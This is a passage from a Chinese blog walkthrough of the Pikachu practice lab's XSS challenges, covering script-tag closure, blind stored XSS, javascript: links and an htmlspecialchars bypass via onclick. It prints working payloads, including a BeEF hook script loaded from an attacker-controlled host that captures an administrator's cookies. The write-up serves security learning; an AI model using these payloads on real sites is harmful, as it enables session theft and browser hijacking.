<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">	$ms=&#x27;tmac&#x27;;</span><br><span class="line">    if($ms.length != 0)&#123;</span><br><span class="line">        if($ms == &#x27;tmac&#x27;)&#123;</span><br><span class="line">            $(&#x27;#fromjs&#x27;).text(&#x27;tmac确实厉害,看那小眼神..&#x27;)</span><br><span class="line">        &#125;else &#123;</span><br><span class="line">//            alert($ms);</span><br><span class="line">            $(&#x27;#fromjs&#x27;).text(&#x27;无论如何不要放弃心中所爱..&#x27;)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>再随便输入一串字符</p>
<p><img src="/images/image-20230109095120480.png" alt="image-20230109095120480"></p>
<p>传入的字符会被放进该$ms，于是我们就可以构造闭合</p>
<h2 id="解题-1"><a href="#解题-1" class="headerlink" title="解题"></a>解题</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;/script&gt;&lt;script&gt;alert(123)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>先使用闭合前面的<script>，再执行自己的payload</p>
<p><img src="/images/image-20230109095418811.png" alt="image-20230109095418811"></p>
<p>这些题的逻辑都类似，找闭合，绕过过滤，绕过实体转换</p>
<h1 id="XSS之盲打"><a href="#XSS之盲打" class="headerlink" title="XSS之盲打"></a>XSS之盲打</h1><p>盲打指的是一种攻击场景</p>
<p>在留言框或姓名中插入Payload测试，根据提示登录到后台查看留言的信息，直接触发XSS</p>
<p>先随便输入一些内容</p>
<p><img src="/images/image-20230108023741293.png" alt="image-20230108023741293"></p>
<p>提示给出了后台地址</p>
<p><img src="/images/image-20230108023827084.png" alt="image-20230108023827084"></p>
<p>根据提示登录</p>
<p><img src="/images/image-20230108024052825.png" alt="image-20230108024052825"></p>
<p>可以看到我们输入的内容</p>
<p><img src="/images/image-20230108024128492.png" alt="image-20230108024128492"></p>
<p>该场景叫做盲打也是因为这个，插入xss payload后，我们只能等待管理员点击从而利用</p>
<p>数据库中能够看到插入的payload</p>
<p><img src="/images/image-20230108030928953.png" alt="image-20230108030928953"></p>
<p>所以也属于存储型XSS</p>
<h2 id="利用-1"><a href="#利用-1" class="headerlink" title="利用"></a>利用</h2><p>这里可以用之前的BEEF平台进行利用</p>
<p>这里先使用alert弹窗进行测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(111)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230108025041967.png" alt="image-20230108025041967"></p>
<p>当管理员登录后台后，就会出现弹窗</p>
<p><img src="/images/image-20230108025123698.png" alt="image-20230108025123698"></p>
<p>pikachu有自己的XSS平台</p>
<p><img src="/images/image-20230108030049268.png" alt="image-20230108030049268"></p>
<p>需要提前配置数据库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pikachu\inc\config.inc.php</span><br></pre></td></tr></table></figure>

<p>安装初始化即可</p>
<p><img src="/images/image-20230108030444690.png" alt="image-20230108030444690"></p>
<p>这里我们使用beef进行测试</p>
<p>具体使用在《BeEF xss利用框架安装使用.md》中有说明</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script src=&quot;http://192.168.28.150:3000/hook.js&quot;&gt;&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230108170625920.png" alt="image-20230108170625920"></p>
<p>管理员登录到后台后</p>
<p>可以看到beef这边已有主机信息，包括cookie等</p>
<p><img src="/images/image-20230108170850091.png" alt="image-20230108170850091"></p>
<h1 id="xss之href输出"><a href="#xss之href输出" class="headerlink" title="xss之href输出"></a>xss之href输出</h1><p>该题如果输出的信息为<a target="_blank" rel="noopener" href="http://www.baidu.com时则正常输出,反之则将输入的值使用htmlspecialchars()函数进行转换/">www.baidu.com时则正常输出，反之则将输入的值使用htmlspecialchars()函数进行转换</a></p>
<h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&quot;&lt;&gt;#?</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230109094424113.png" alt="image-20230109094424113"></p>
<p>可以发现压根没有闭合等，输入啥就是啥</p>
<h2 id="解题-2"><a href="#解题-2" class="headerlink" title="解题"></a>解题</h2><p>可以使用javascript协议来执行js，当点击超链接时会执行该js脚本实现弹窗</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(123)</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20230109094619596.png" alt="image-20230109094619596"></p>
<p>点击触发</p>
<p><img src="/images/image-20230109094603430.png" alt="image-20230109094603430"></p>
<h2 id="javascript协议"><a href="#javascript协议" class="headerlink" title="javascript协议"></a>javascript协议</h2><p>将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中。</p>
<p>这个特殊的协议类型声明了URL的主体是任意的javascript代码，它由javascript的解释器运行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(123)</span><br></pre></td></tr></table></figure>

<p>实际上是将javascript:后面的代码当JavaScript来执行，并将结果值返回给当前页面。</p>
<h1 id="xss之htmlspecialchars"><a href="#xss之htmlspecialchars" class="headerlink" title="xss之htmlspecialchars"></a>xss之htmlspecialchars</h1><p>主要是对htmlspecialchars()函数进行绕过</p>
<p>htmlspecialchars()是PHP里面把预定义的字符转换为HTML实体的函数</p>
<p><img src="/images/image-20230109091304591.png" alt="image-20230109091304591"></p>
<h2 id="测试-1"><a href="#测试-1" class="headerlink" title="测试"></a>测试</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&quot;&lt;&gt;#?</span><br></pre></td></tr></table></figure>

<p>注意需要先用一个单引号将href的双引号闭合后才能看出结果</p>
<p><img src="/images/image-20230109092023309.png" alt="image-20230109092023309"></p>
<p>根据上方返回的信息可以看到字符双引号，<，>都被转换成了HTML实体函数(默认不对'进行处理)</p>
<h2 id="解题-3"><a href="#解题-3" class="headerlink" title="解题"></a>解题</h2><p>寻找闭合，避开被转换的字符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onclick=alert(123) &#x27;</span><br></pre></td></tr></table></figure>

<p>点击触发</p>
<p><img src="/images/image-20230109092702680.png" alt="image-20230109092702680"></p>
<h2 id="参考-2"><a href="#参考-2" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/escape-w/p/10162831.html">https://www.cnblogs.com/escape-w/p/10162831.html</a></p>
</script></p>
    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>感谢大哥~</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="fn 微信">
        <span>微信</span>
      </div>

  </div>
</div>


        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/05/04/pikachu%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/XXE/" rel="prev" title="pikachu靶场系列-XXE">
                  <i class="fa fa-chevron-left"></i> pikachu靶场系列-XXE
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/05/04/pikachu%E9%9D%B6%E5%9C%BA%E7%B3%BB%E5%88%97/%E4%B8%8D%E5%AE%89%E5%85%A8%E7%9A%84URL%E8%B7%B3%E8%BD%AC/" rel="next" title="pikachu靶场系列-不安全的URL跳转">
                  pikachu靶场系列-不安全的URL跳转 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">fn</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>-->

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  





</body>
</html>
